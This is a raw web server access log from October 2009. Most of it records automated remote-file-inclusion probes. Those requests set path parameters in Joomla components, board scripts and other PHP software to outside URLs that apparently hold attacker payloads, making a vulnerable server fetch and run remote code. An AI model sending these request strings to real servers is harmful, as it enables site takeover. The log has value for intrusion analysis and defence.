94.23.2.21 - - [17/Oct/2009:05:29:51 -0400] "GET /logs//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:52 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:53 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:56 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:30:41 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:31:05 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:31:06 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:31:06 -0400] "GET /logs/access_log.Q109071300//newspublish/include.php?path%5Bdocroot%5D=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:31:06 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:31:06 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:31:08 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:31:08 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:31:08 -0400] "GET /logs/access_log.Q109071300%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:31:08 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:31:46 -0400] "GET /logs//appserv/main.php?appserv_root=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:31:46 -0400] "GET //appserv/main.php?appserv_root=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:31:55 -0400] "GET /logs/access_log.Q109071900/errors.php?error=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:32:00 -0400] "GET /logs/access_log.Q109072000/errors.php?error=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:05:32:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.3.107.130 - - [17/Oct/2009:05:32:47 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:32:47 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:32:47 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:32:55 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:33:02 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:33:02 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:33:02 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:33:07 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:05:34:00 -0400] "GET /logs/access_log.Q109090900%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:34:50 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:34:51 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:34:51 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:05:35:04 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:05:35:04 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:05:35:04 -0400] "GET /logs/access_log.Q109062800%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:35:21 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
166.137.5.158 - - [17/Oct/2009:05:35:41 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
218.27.203.107 - - [17/Oct/2009:05:36:02 -0400] "GET /logs/access_log.Q109080600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:36:11 -0400] "GET /logs/access_log.Q109051400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:36:45 -0400] "GET /logs/access_log.Q109062800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
122.153.32.10 - - [17/Oct/2009:05:36:57 -0400] "GET /logs/access_log.Q109092600/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.153.32.10 - - [17/Oct/2009:05:36:57 -0400] "GET /logs/error_log.Q109092600/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:05:37:10 -0400] "GET /logs/access_log.Q109081900%20%20/components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:05:37:24 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:05:37:24 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:05:37:24 -0400] "GET /logs/access_log.Q109062800%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:05:37:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.211.6.161 - - [17/Oct/2009:05:38:07 -0400] "GET /logs/access_log.Q109092200%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:38:07 -0400] "GET /logs/access_log.Q109070500%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:38:07 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:38:07 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:38:11 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:38:11 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:38:11 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:38:25 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:39:16 -0400] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:05:39:16 -0400] "GET /logs/access_log.Q109090900%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:13 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:13 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:13 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:21 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:21 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:21 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:26 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:26 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:29 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:40:33 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:35 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:35 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:35 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:40:36 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:40:36 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:40:36 -0400] "GET /logs/access_log.Q109062800%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:40:37 -0400] "GET /logs/access_log.Q109061000%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:40 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:40 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:40 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:43 -0400] "GET //?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:43 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:05:40:43 -0400] "GET /logs//?_zb_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:40:44 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:51 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:51 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:51 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:56 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:56 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:40:56 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.197.86.189 - - [17/Oct/2009:05:41:11 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
218.27.203.107 - - [17/Oct/2009:05:41:24 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:41:35 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:41:35 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:41:35 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:41:40 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:41:40 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:41:40 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:41:40 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:41:42 -0400] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:41:43 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:41:43 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:41:44 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:41:44 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:41:44 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:41:44 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:41:44 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:41:49 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:41:49 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:41:53 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:41:53 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:41:53 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:41:57 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:41:58 -0400] "GET /logs/access_log.Q109080600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:42:02 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:42:02 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:42:02 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:42:05 -0400] "GET /logs/access_log.Q109051400%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
174.51.227.141 - - [17/Oct/2009:05:42:12 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://sz0087.ev.mail.comcast.net/zimbra/mail" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDC; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
174.51.227.141 - - [17/Oct/2009:05:42:12 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://sz0087.ev.mail.comcast.net/zimbra/mail" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDC; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
94.23.2.21 - - [17/Oct/2009:05:42:15 -0400] "GET //Neos_Chronos/header.php?base_folder=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:42:15 -0400] "GET /logs//Neos_Chronos/header.php?base_folder=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:42:15 -0400] "GET /logs/access_log.Q109092800%20%20//Neos_Chronos/header.php?base_folder=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:42:16 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
